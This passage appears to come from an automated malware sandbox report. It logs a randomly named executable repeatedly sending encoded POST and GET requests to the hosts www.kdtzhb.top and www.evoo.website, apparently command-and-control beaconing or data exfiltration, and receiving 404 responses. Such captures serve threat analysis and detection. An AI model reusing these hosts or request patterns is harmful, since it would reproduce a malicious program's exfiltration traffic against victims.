                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.84972547.242.89.146805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:48.385265112 CET627OUTPOST /1iqa/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.kdtzhb.top
                                                                                        Origin: http://www.kdtzhb.top
                                                                                        Referer: http://www.kdtzhb.top/1iqa/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 45 34 68 2f 39 37 2f 55 69 32 41 6a 57 33 35 45 33 36 36 45 36 71 39 4c 77 69 45 6d 51 53 59 4f 63 6c 4a 45 41 56 36 64 4a 6c 6c 6d 63 46 51 64 36 52 69 79 59 55 49 57 79 6e 54 34 4f 4f 70 46 56 52 6c 62 61 36 41 4e 2b 33 32 38 76 72 66 6d 73 57 53 34 34 61 46 67 39 74 6f 5a 59 75 44 78 50 75 4b 2f 57 61 4a 71 33 4c 33 7a 4b 58 57 32 59 4a 4f 58 4b 56 38 72 50 59 43 7a 45 44 4c 37 69 70 70 49 38 4f 63 4c 36 2f 59 4e 6f 42 56 55 7a 49 43 63 59 38 72 71 41 6e 50 4d 65 30 53 74 67 69 59 43 70 39 46 70 4a 54 56 75 2b 57 69 53 33 76 4e 38 44 2b 6c 43 67 58 30 3d
                                                                                        Data Ascii: A60d=JKwJ9AShvSeAE4h/97/Ui2AjW35E366E6q9LwiEmQSYOclJEAV6dJllmcFQd6RiyYUIWynT4OOpFVRlba6AN+328vrfmsWS44aFg9toZYuDxPuK/WaJq3L3zKXW2YJOXKV8rPYCzEDL7ippI8OcL6/YNoBVUzICcY8rqAnPMe0StgiYCp9FpJTVu+WiS3vN8D+lCgX0=
                                                                                        Nov 6, 2024 16:00:49.338651896 CET691INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:00:49 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 548
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.84972647.242.89.146805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:51.101100922 CET647OUTPOST /1iqa/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.kdtzhb.top
                                                                                        Origin: http://www.kdtzhb.top
                                                                                        Referer: http://www.kdtzhb.top/1iqa/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 49 4f 63 47 64 45 44 52 75 64 49 6c 6c 6d 58 6c 51 63 33 78 69 35 59 55 4e 72 79 6d 76 34 4f 4f 39 46 56 51 56 62 61 4a 6f 4d 73 33 32 2b 33 62 66 6b 68 32 53 34 34 61 46 67 39 73 4d 6a 59 75 62 78 4f 65 61 2f 58 35 52 70 37 72 33 30 43 33 57 32 53 70 4f 54 4b 56 39 2b 50 64 2f 6f 45 46 50 37 69 6f 5a 49 79 36 49 4d 76 50 59 4c 6e 68 55 72 33 36 54 74 57 4f 33 56 47 48 44 77 63 6c 32 74 6f 30 70 6f 7a 66 4e 76 4b 54 39 46 2b 56 4b 6b 79 59 51 55 5a 64 31 79 2b 41 69 47 78 74 76 39 4b 6c 4a 46 49 32 62 5a 2b 6d 52 68 6b 34 48 61
                                                                                        Data Ascii: A60d=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkIOcGdEDRudIllmXlQc3xi5YUNrymv4OO9FVQVbaJoMs32+3bfkh2S44aFg9sMjYubxOea/X5Rp7r30C3W2SpOTKV9+Pd/oEFP7ioZIy6IMvPYLnhUr36TtWO3VGHDwcl2to0pozfNvKT9F+VKkyYQUZd1y+AiGxtv9KlJFI2bZ+mRhk4Ha
                                                                                        Nov 6, 2024 16:00:52.077533007 CET691INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:00:51 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 548
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.84972747.242.89.146805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:53.774487019 CET1664OUTPOST /1iqa/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.kdtzhb.top
                                                                                        Origin: http://www.kdtzhb.top
                                                                                        Referer: http://www.kdtzhb.top/1iqa/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 41 4f 62 30 46 45 5a 7a 47 64 61 56 6c 6d 4c 56 51 5a 33 78 69 65 59 51 5a 76 79 6d 6a 43 4f 4e 46 46 56 79 4e 62 53 59 6f 4d 6d 33 32 2b 2b 37 66 70 73 57 53 58 34 61 31 6b 39 74 38 6a 59 75 62 78 4f 59 65 2f 51 71 4a 70 39 72 33 7a 4b 58 57 79 59 4a 50 30 4b 56 6c 75 50 63 76 34 44 31 76 37 69 4c 68 49 77 4a 67 4d 74 76 59 4a 72 42 55 7a 33 36 66 32 57 4f 72 5a 47 45 66 65 63 69 43 74 37 42 59 44 6f 4f 46 75 59 44 51 37 32 6c 32 67 7a 6f 55 33 55 65 35 68 33 79 75 66 35 4e 32 58 4e 6c 34 4a 66 30 75 63 67 54 64 6e 31 39 53 73 38 76 2b 6c 71 78 44 2b 55 66 39 66 4f 74 55 41 6b 31 41 2b 79 36 56 4f 4c 4f 76 2f 30 42 6b 71 65 33 73 35 65 36 33 4a 44 6a 2f 37 53 55 45 77 6f 74 58 49 54 72 6c 4c 4e 71 6d 64 74 50 34 52 4a 30 37 52 71 77 39 52 6e 48 30 63 59 73 32 4e 6b 4e 68 32 33 73 2b 64 5a 30 56 4a 75 51 69 4a 71 4f 6c 55 4e 72 38 64 47 68 42 51 54 61 70 35 4c [TRUNCATED]
                                                                                        Data Ascii: A60d=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkAOb0FEZzGdaVlmLVQZ3xieYQZvymjCONFFVyNbSYoMm32++7fpsWSX4a1k9t8jYubxOYe/QqJp9r3zKXWyYJP0KVluPcv4D1v7iLhIwJgMtvYJrBUz36f2WOrZGEfeciCt7BYDoOFuYDQ72l2gzoU3Ue5h3yuf5N2XNl4Jf0ucgTdn19Ss8v+lqxD+Uf9fOtUAk1A+y6VOLOv/0Bkqe3s5e63JDj/7SUEwotXITrlLNqmdtP4RJ07Rqw9RnH0cYs2NkNh23s+dZ0VJuQiJqOlUNr8dGhBQTap5L/AleWCYSCQkSLC2Snpofx3fO9lFuxclnF8FKgU7p8Q5+K7lwsp1UZ/XkAGOqHc+QBistn/lNoCoxDdQ/18mf+uV0UYsCxEKemL6x59c9RkAzDhWcfvJhEmGC2N0h8K5MXwtvRZOyyvw8BWrU8Ao7WumtkFD1Hwwl4VQ9allwOKNCkN15WvhBrN/oWOn6iogFZUrnOozbjXP3H+XRnk0tvNzDzoqpqSZ0yOUDCYBfPAuy5qx7zzGy6v+mMlgyYlAPudAF63emTRGYQ5O3p3RYaV5czJfiIXuf21BIhDVfwkyRKLzZxJlGI7jIkQhTL7EtoRgR/b1ZwN4Q1LWDhsgEiaTXZvsCk7ZTgsPV9sUqdHNHGFdx91ieQEEkdF9xrgXFQvhDZPw/1c/DdkJSHGp4WEgdMWpARVPOoB4SrSFYhh0ivLM9hWP4ZWJDdCjKydOf3Rfem/XZtmyDITYXMhLFJ1iBKpufZ8igG2ZIJXIQKnzf/WXWV+Q79EYliaj6cg/uUdBY7uX+grUnkpeBFx6sFHGCPJxnhvPx5+u41k61ZouS+B8mOwhiimBdQJfbogGFT/rnIrTvADeqaDhVVpoicGBRfji62Qf8zOxhGHSh1kDNbdLzayLaygVjXKJA5akLAbhu4pBEVVFGhAojRCU3xKAthHwpf48H2s [TRUNCATED]
                                                                                        Nov 6, 2024 16:00:54.698548079 CET691INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:00:54 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 548
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.84972847.242.89.146805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:56.334151030 CET376OUTGET /1iqa/?A60d=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQhWC34rDkgUmQuOVrwdU4dvabP7OAcppow6eveUPberj5Ig==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.kdtzhb.top
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:00:57.285500050 CET691INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:00:57 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 548
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.849729128.65.195.180805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:02.655230999 CET633OUTPOST /293d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.evoo.website
                                                                                        Origin: http://www.evoo.website
                                                                                        Referer: http://www.evoo.website/293d/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 4b 2b 4a 34 44 4b 44 4f 32 6b 4c 74 36 69 39 51 65 73 64 78 33 45 4b 49 52 46 62 41 4d 32 79 42 77 61 4e 6f 6c 42 39 4e 46 41 59 78 6f 37 6e 57 38 38 35 76 59 43 69 66 50 35 73 59 4c 7a 50 34 48 51 37 30 4d 76 7a 44 57 4b 59 33 31 72 44 76 55 78 71 4e 62 4b 63 4e 53 69 70 6f 44 64 65 4a 6c 45 5a 71 6f 51 75 51 6d 6c 54 46 70 73 49 63 6c 69 49 65 30 42 4d 41 37 75 67 79 45 67 45 44 34 74 64 4d 70 67 42 48 66 51 61 46 6e 4d 50 69 49 69 38 34 32 4f 30 6a 49 30 72 33 79 36 33 76 62 2b 51 33 49 43 52 47 65 46 47 6c 6b 46 44 41 38 58 6f 79 4a 57 74 36 70 58 30 3d
                                                                                        Data Ascii: A60d=2ZmzkMINTYaaK+J4DKDO2kLt6i9Qesdx3EKIRFbAM2yBwaNolB9NFAYxo7nW885vYCifP5sYLzP4HQ70MvzDWKY31rDvUxqNbKcNSipoDdeJlEZqoQuQmlTFpsIcliIe0BMA7ugyEgED4tdMpgBHfQaFnMPiIi842O0jI0r3y63vb+Q3ICRGeFGlkFDA8XoyJWt6pX0=
                                                                                        Nov 6, 2024 16:01:03.414921999 CET458INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:01:03 GMT
                                                                                        Server: Apache/2.4.25 (Debian)
                                                                                        Content-Length: 278
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.849730128.65.195.180805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:05.209865093 CET653OUTPOST /293d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.evoo.website
                                                                                        Origin: http://www.evoo.website
                                                                                        Referer: http://www.evoo.website/293d/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 65 42 33 2f 78 6f 33 51 39 4e 45 41 59 78 6a 62 6e 58 7a 63 35 77 59 43 75 58 50 38 4d 59 4c 7a 4c 34 48 56 2f 30 4d 2f 4f 78 58 61 59 31 2b 4c 44 58 4a 68 71 4e 62 4b 63 4e 53 6a 4d 44 44 5a 79 4a 6c 30 70 71 70 30 79 50 72 46 54 61 2f 38 49 63 76 43 49 61 30 42 4e 56 37 73 55 4c 45 69 4d 44 34 73 74 4d 71 31 68 41 52 51 61 44 6a 4d 4f 31 4f 54 42 32 75 76 4d 41 55 57 44 2b 30 4a 53 52 65 49 68 64 53 67 5a 41 64 46 75 4f 6b 47 72 32 35 67 31 61 54 31 39 4b 33 41 6a 73 4f 64 59 39 74 2f 32 32 30 4a 6f 54 42 63 51 50 4c 6e 65 54
                                                                                        Data Ascii: A60d=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCeB3/xo3Q9NEAYxjbnXzc5wYCuXP8MYLzL4HV/0M/OxXaY1+LDXJhqNbKcNSjMDDZyJl0pqp0yPrFTa/8IcvCIa0BNV7sULEiMD4stMq1hARQaDjMO1OTB2uvMAUWD+0JSReIhdSgZAdFuOkGr25g1aT19K3AjsOdY9t/220JoTBcQPLneT
                                                                                        Nov 6, 2024 16:01:06.028194904 CET458INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:01:05 GMT
                                                                                        Server: Apache/2.4.25 (Debian)
                                                                                        Content-Length: 278
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
